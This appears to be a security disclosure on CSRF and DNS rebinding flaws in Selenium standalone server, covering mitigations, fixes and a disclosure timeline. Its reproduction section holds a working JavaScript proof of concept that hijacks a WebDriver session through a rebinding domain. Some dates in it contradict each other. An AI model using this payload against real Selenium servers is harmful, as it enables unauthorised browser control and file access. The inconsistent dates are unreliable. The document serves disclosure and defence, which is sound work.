**HTTP-level Authentication**

An new command-line flag could be added to selenium-standalone-server in order to enable some form of HTTP authentication. When enabled, this would prevent CSRF attacks as well as attacks from other users on the same host.

**PF\_LOCAL Socket**

selenium-standalone-server could receive a new option to listen on a `PF_LOCAL` socket. These sockets are normally not accessible by CSRF. This could additionally be used to prevent other users on the same machine from talking to the selenium-standalone-server instance.

**DNS rebinding**

Selenium server is vulnerable to DNS rebinding attacks. In contrast to the Crossite-Site Request Forgery (CSRF), when using this vulnerability, an attacker can see the responses of the attacked Selenium server instance. The attacker can thus interact with the created WebDriver session. This could be used:

*   to attack local services (localhost-bound or on the local network);
*   to attack remote services using the IP address of the victim;
*   reading local files (by navigating to `file://`);
*   running other programs by navigating to URIs with other schemes;
*   remote code execution.

This vulnerability has been tested on:

*   Mozilla Firefox Nightly 80.0a1 (2020-07-13)
*   Chromium 83.0.4103.116 built on Debian bullseye/sid, running on Debian bullseye/sid
*   ChromeDriver 83.0.4103.116 (8f0c18b4dca9b6699eb629be0f51810c24fb6428-refs/branch-heads/4103@{#716})
*   geckodriver 0.26.0 (e9783a644016 2019-10-10 13:38 +0000)
*   selenium-server-4.0.0-alpha-6.jar
*   Debian testing

**Reproduction steps**

Run selenium server:

`java -jar selenium-server-4.0.0-alpha-6.jar -port 5555`

The following JavaScript payload served from a HTTP web server using the same port number as Selenium (eg. TCP 5555) may be used to trigger the vulnerability:

`function sleep(delay) {   return new Promise((resolve, reject) => {setInterval(resolve, delay);}); } async function createSession() {   while (true) {     const response = await fetch("/wd/hub/session", {         method: "POST",         mode: "same-origin",         headers: {             'Content-Type': 'application/json'         },         body: JSON.stringify({           "capabilities": {             "alwaysMatch": {               "browserName": "firefox"             }           }         })     });     if (response.status >= 200 && response.status < 300)       return response.json();     await sleep(1000);   } } async function main() {   const creation = await createSession();   const sessionId = creation.value.sessionId;   const sessionPath = "/wd/hub/session/" + sessionId;   fetch(sessionPath + "/url", {     method: "POST",     mode: "same-origin",     headers: {       'Content-Type': 'application/json',     },     body: JSON.stringify({       "url": "https://www.youtube.com/watch?v=oHg5SJYRHA0"     })   }); } main();`

The browser user must access this web server using a DNS rebinding domain name. For example using whonow:

`http://a.192.0.2.1.3time.192.168.1.42.forever.3600bba7-1363-43c6-0065-ccb92aaeccb3.rebind.network:5555/`

**Mitigations**

Selenium server is vulnerable to DNS rebinding attacks because it is accepting requests using arbitrary `Host` header (eg. `Host: rebind.netlib.re:4444`). By checking the value of the `Host` header and enforcing values such as `localhost:444`, we can prevent DNS rebinding attacks.

**Resolution**

In 2020-06-10, I checked selenium-server-4.0.0-beta-4. and found that changes were merged in commit 48a54517e9e5c8fd7b619b8199398fae03199892 releases the 10th July 2020. This was fixed in 4.0.0-alpha-7.

**CSRF protection**

It is apparently not vulnerable to CSRF because it checks the `Content-Type` header.

`public static final String JSON_UTF_8 = "application/json; charset=utf-8";  // [...]  String type = req.getHeader("Content-Type"); if (type == null) {   return NO_HEADER; }  try {   if (!MediaType.JSON_UTF_8.equals(MediaType.parse(type))) {     return badType(type);   } } catch (IllegalArgumentException e) {   return badType(type); }`

**DNS rebinding protection**

Some DNS rebinding protection has been implemented. However, Selenium server does not check the `Host` header but only checks the `Origin` header (if present). As a consequence, it is not vulnerable to DNS rebinding attacks through evergreen browsers but could be vulnerable through other (older) browsers.

`String origin = req.getHeader("Origin"); if (origin != null && !allowedHosts.contains(origin)) {   return new HttpResponse()     .setStatus(HTTP_INTERNAL_ERROR)     .addHeader("Content-Type", JSON_UTF_8)     .setContent(Contents.asJson(ImmutableMap.of(       "value", ImmutableMap.of(         "error", "unknown error",         "message", "Origin not allowed: " + origin,         "stacktrace", "")))); }`

**Impact**

The Selenium doc says the following:

> **Warning**
> 
> The Selenium Grid must be protected from external access using appropriate firewall permissions.
> 
> Failure to protect your Grid could result in one or more of the following occurring:
> 
> *   You provide open access to your Grid infrastructure
> *   You allow third parties to access internal web applications and files
> *   You allow third parties to run custom binaries
> 
> See this blog post on Detectify, which gives a good overview of how a publicly exposed Grid could be misused: Don’t Leave your Grid Wide Open

However, the CSRF and DNS-rebinding attacks can be used to bypass firewall permissions. If some browser in the local network visits a malicious website, this website could exploit the browser to reach WebDriver endpoint and execute arbitrary code. This include browser instances launched by Selenium itself.

**References**

*   WebDriver

**Timeline**

*   2020-06-30, Reported CSRF vulnerability to Selenium Team
*   2020-07-14, Reported DNS-rebinding to Selenium Team
*   2020-07-03, Worked with Selenium team to help them reproduce the bug and got confirmation
*   2020-07-10, Fixes developed
*   2021-06-10, Checked against latest beta (selenium-server-4.0.0-beta-4)
*   2021-06-10, Asked for update and disclosure schedule
*   2021-06-12, Requested CVE IDs
*   2022-04-16, CVE IDs allocated

Tag

#java